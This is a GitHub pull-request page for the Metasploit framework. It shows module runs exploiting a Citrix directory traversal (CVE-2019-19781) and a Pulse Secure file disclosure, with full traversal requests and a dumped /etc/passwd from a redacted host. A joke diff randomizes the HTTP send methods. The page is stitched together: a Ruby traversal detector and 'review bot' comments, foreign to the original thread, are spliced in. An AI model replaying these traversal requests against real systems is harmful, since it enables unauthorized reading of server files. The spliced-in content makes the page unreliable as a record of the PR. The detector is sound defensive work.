
Fix #12813, prefer send_request_cgi over send_request_raw #12820

Merged
merged 2 commits into from Jan 14, 2020

Conversation

@wvu-r7
Contributor

wvu-r7 commented Jan 14, 2020

Fixes #12813 and more specifically #12816 (comment). The only tradition is CHAOS.

msf5 auxiliary(scanner/http/citrix_dir_traversal) > run

********************
####################
# Request:
####################
GET /vpn/../vpns/cfg/smb.conf HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/x-www-form-urlencoded


####################
# Response:
####################
HTTP/1.1 200 OK
Date: Tue, 14 Jan 2020 06:40:03 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Last-Modified: Sun, 12 Jan 2020 22:27:43 GMT
ETag: "53-59bf8de0ad5c0"
Accept-Ranges: bytes
Content-Length: 83
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Content-Type: text/plain; charset=UTF-8

[global]
	encrypt passwords = yes
	name resolve order = lmhosts wins host bcast

[+] http://127.0.0.1:8080/vpn/../vpns/cfg/smb.conf - The target is vulnerable to CVE-2019-19781.
[+] Obtained HTTP response code 200 for http://127.0.0.1:8080/vpn/../vpns/cfg/smb.conf. This means that access to /vpn/../vpns/cfg/smb.conf was obtained via directory traversal.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/http/citrix_dir_traversal) >
msf5 auxiliary(gather/pulse_secure_file_disclosure) > run
[*] Running module against [redacted]

[*] Running in manual mode
[*] Dumping /etc/passwd
********************
####################
# Request:
####################
GET /dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/ HTTP/1.1
Host: [redacted]
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/x-www-form-urlencoded


####################
# Response:
####################
HTTP/1.1 200 OK
Cache-Control: max-age=86400, must-revalidate
Last-Modified: Mon, 09 Sep 2019 15:10:05 GMT
Content-Length: 273
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=31536000

root:x:0:0:root:/:/bin/bash
nfast:x:0:0:nfast:/:/bin/bash
bin:x:1:1:bin:/:
nobody:x:99:99:Nobody:/:
dns:x:98:98:DNS:/:
term:x:97:97:Telnet/SSH:/:
web80:x:96:96:Port 80 web:/:
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
postgres:x:102:102:PostgreSQL User:/:

root:x:0:0:root:/:/bin/bash
nfast:x:0:0:nfast:/:/bin/bash
bin:x:1:1:bin:/:
nobody:x:99:99:Nobody:/:
dns:x:98:98:DNS:/:
term:x:97:97:Telnet/SSH:/:
web80:x:96:96:Port 80 web:/:
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
postgres:x:102:102:PostgreSQL User:/:

[+] /Users/wvu/.msf4/loot/20200114004238_default_[redacted]_PulseSecureVPN_774075.bin
[*] Auxiliary module execution completed
msf5 auxiliary(gather/pulse_secure_file_disclosure) >

Note the only difference is Content-Type: application/x-www-form-urlencoded, and it isn't an issue for these vulns.
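The two request lines in the transcript above are only useful to the module because the client sends the `..` segments verbatim instead of resolving them; on the server side, the same property is what a log review can key on. The following is an added example, not code from this PR or from Metasploit: it flags request targets whose path still carries dot-segments (including percent-encoded ones) and reports the path the origin server would actually resolve. The helper names and the sample request lines are constructed for this example.

```ruby
# Added example, not code from this PR or from Metasploit: a log-side check
# that flags request targets whose path still carries dot-segments, as the
# two probes in the PR transcript do. Sample request lines are constructed.

# Undo percent-encoding so "%2e%2e" is treated the same as ".." (hypothetical
# helper; a real log pipeline would decode once, consistently).
def percent_decode(str)
  str.gsub(/%([0-9a-fA-F]{2})/) { Regexp.last_match(1).hex.chr }
end

# Resolve "." and ".." the way RFC 3986 section 5.2.4 does. A ".." that would
# climb above the root is dropped, which is what an origin server does before
# the file system ever sees the path.
def normalise_path(raw_path)
  out = []
  raw_path.split('/', -1).each do |seg|
    case seg
    when '', '.' then next
    when '..'    then out.pop
    else out << seg
    end
  end
  '/' + out.join('/')
end

# Parse "METHOD target HTTP/x.y". Returns nil for a clean request, or a hash
# describing the probe when the decoded path contains a dot-segment.
def traversal_probe?(request_line)
  method, target, _version = request_line.split(' ', 3)
  return nil unless method && target
  path, query = target.split('?', 2)
  decoded = percent_decode(path)
  segments = decoded.split('/')
  return nil unless segments.include?('..') || segments.include?('.')
  { method: method, raw: path, normalised: normalise_path(decoded), query: query }
end

# Constructed sample request lines: the two probes from the PR transcript, a
# percent-encoded variant of the first, and one benign request.
SAMPLE_REQUESTS = [
  'GET /vpn/../vpns/cfg/smb.conf HTTP/1.1',
  'GET /dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/ HTTP/1.1',
  'GET /vpn/%2e%2e/vpns/cfg/smb.conf HTTP/1.1',
  'GET /vpn/index.html HTTP/1.1'
].freeze

# Run the check over a batch of request lines and keep only the hits.
def scan(lines)
  lines.map { |line| traversal_probe?(line) }.compact
end
```

The `normalised` value in each hit is the path the server would serve if it resolved the dot-segments itself, which is the file the probe is after.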

wvu-r7 added 2 commits Jan 14, 2020
Since I bypassed query/vars_get, send_request_cgi is fine now.
@wvu-r7 wvu-r7 self-assigned this Jan 14, 2020
wvu-r7 added a commit that referenced this pull request Jan 14, 2020
@wvu-r7 wvu-r7 merged commit 002fe64 into rapid7:master Jan 14, 2020
1 of 3 checks passed
Metasploit Automation - Sanity Test Execution Running automation sanity tests. Details available on completion.
continuous-integration/travis-ci/pr The Travis CI build is in progress
Metasploit Automation - Test Execution Successfully completed all tests.
@wvu-r7 wvu-r7 deleted the wvu-r7:bug/citrix branch Jan 14, 2020
@bcoles


Contributor

bcoles commented Jan 14, 2020

The only tradition is CHAOS.

diff --git a/lib/msf/core/exploit/http/client.rb b/lib/msf/core/exploit/http/client.rb
index 3bcec88e4a..364a84ec94 100644
--- a/lib/msf/core/exploit/http/client.rb
+++ b/lib/msf/core/exploit/http/client.rb
@@ -308,7 +308,7 @@ module Exploit::Remote::HttpClient
   #
   # Passes +opts+ through directly to Rex::Proto::Http::Client#request_raw.
   #
-  def send_request_raw(opts={}, timeout = 20, disconnect = false)
+  def send_request_raw2(opts={}, timeout = 20, disconnect = false)
     if datastore['HttpClientTimeout'] && datastore['HttpClientTimeout'] > 0
       actual_timeout = datastore['HttpClientTimeout']
     else
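Review bot: renaming the public `send_request_raw` to `send_request_raw2` at `def send_request_raw2(opts={}, timeout = 20, disconnect = false)` changes a method that modules call by name, while the comment block above it still describes the old name's contract and the `2` suffix says nothing about how the two differ. If an implementation method is needed, name it for what it does and keep the doc comment in sync.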
@@ -354,6 +354,21 @@ module Exploit::Remote::HttpClient
     end
   end
 
+  def send_request_cgi(opts={}, timeout = 20, disconnect = true)
+    if [true, false].sample
+      send_request_raw2(opts, timeout, disconnect)
+    else
+      send_request_cgi2(opts, timeout, disconnect)
+    end
+  end
+
+  def send_request_raw(opts={}, timeout = 20, disconnect = true)
+    if [true, false].sample
+      send_request_raw2(opts, timeout, disconnect)
+    else
+      send_request_cgi2(opts, timeout, disconnect)
+    end
+  end
 
   # Connects to the server, creates a request, sends the request,
   # reads the response
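Review bot: the `[true, false].sample` dispatch in both new `send_request_cgi` and `send_request_raw` makes every request non-deterministic, so a module cannot rely on either method's contract (header set, URI handling) and failures will not reproduce; the two wrappers are also byte-for-byte identical, so there is no reason to keep both. In addition, the new `send_request_raw` defaults `disconnect = true` while the renamed `send_request_raw2` keeps `disconnect = false`, silently changing connection handling for callers that relied on the old default. Each wrapper should call its own implementation deterministically and keep the original default.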
@@ -361,7 +376,7 @@ module Exploit::Remote::HttpClient
   # Passes `opts` through directly to {Rex::Proto::Http::Client#request_cgi}.
   #
   # @return (see Rex::Proto::Http::Client#send_recv))
-  def send_request_cgi(opts={}, timeout = 20, disconnect = true)
+  def send_request_cgi2(opts={}, timeout = 20, disconnect = true)
     if datastore['HttpClientTimeout'] && datastore['HttpClientTimeout'] > 0
       actual_timeout = datastore['HttpClientTimeout']
     else
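Review bot: the same concern as for `send_request_raw2` applies to `send_request_cgi2`: the rename turns a documented public method into an undocumented one, and the doc block being touched here still reads `@return (see Rex::Proto::Http::Client#send_recv))` with an unbalanced closing parenthesis, which is worth fixing in the same change.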
@wvu-r7


Contributor Author

wvu-r7 commented Jan 14, 2020

APPROVED.

msjenkins-r7 added a commit that referenced this pull request Jan 14, 2020